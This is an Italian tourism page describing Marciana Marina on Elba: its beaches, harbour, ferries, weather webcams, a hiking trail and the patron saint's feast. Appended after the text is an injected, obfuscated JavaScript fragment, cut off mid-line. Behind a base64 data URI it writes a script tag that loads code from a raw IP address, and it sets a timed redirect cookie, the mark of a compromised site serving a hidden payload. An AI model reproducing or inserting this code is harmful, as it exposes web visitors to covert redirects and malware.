Amanti della tranquillità e della buona cucina: Marciana Marina fa al caso vostro!
Posto alle pendici del Monte Capanne e immerso nella rigogliosa macchia mediterranea, il grazioso paese di Marciana Marina è conosciuto per le sue caratteristiche viuzze e piazzette del borgo antico, la Torre Pisana e la scenografica area del Cotone con le sue case arrampicate sugli scogli, negozi e ristoranti che ne fanno un polo turistico tra i più amati dell’isola.
Comodissime per chi alloggia in paese e non vuole spostarsi in macchina, ben due sono le spiagge che Marciana Marina offre, una parallela al lungomare, ed un’altra vicino alla Torre, composte in prevalenza da sabbia e ghiaia sottile ed attrezzate di stabilimenti balneari per affittare ombrelloni e sdraio o prenotare escursioni in barca, fare sport acquatici e immersioni guidate. Il lungomare offre tutto quello che serve con negozi, bar, ristoranti, autobus, bagni pubblici, banca, edicola, farmacia, minimarket, parcheggio auto e pompa di rifornimento di carburante.
Sicuramente uno dei porti turistici più attrezzati dell’isola, il porto di Marciana Marina è protetto da un molo costituito da massi artificiali. Da qui è possibile salpare a bordo di traghetti per escursioni a Pianosa o in Corsica. Come altre località dell’isola, anche a Marciana Marina web cam attive h24 sono disponibili online per verificare le condizioni del tempo. Un servizio meteo efficiente e sicuro di web cam su Marciana Marina utile soprattutto proprio per chi vuole imbarcarsi per le isole vicine e vuole conoscere le condizioni del mare. Le webcam di Marciana si possono visualizzare su siti come cvmm.it, meteoindiretta.it, ilmeteo.it, webcam-elba.it.
Le webcam a Marciana Marina possono essere utili anche per gli amanti del trekking che vogliano percorrere il “Sentiero dei Profumi” che va da Marciana Marina lungo la Val di Cappone fino al Crinale della Ripa, oppure per chi ama il folklore e il 12 Agosto volesse assistere alla festa di Santa Chiara d’Assisi, patrona del paese. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘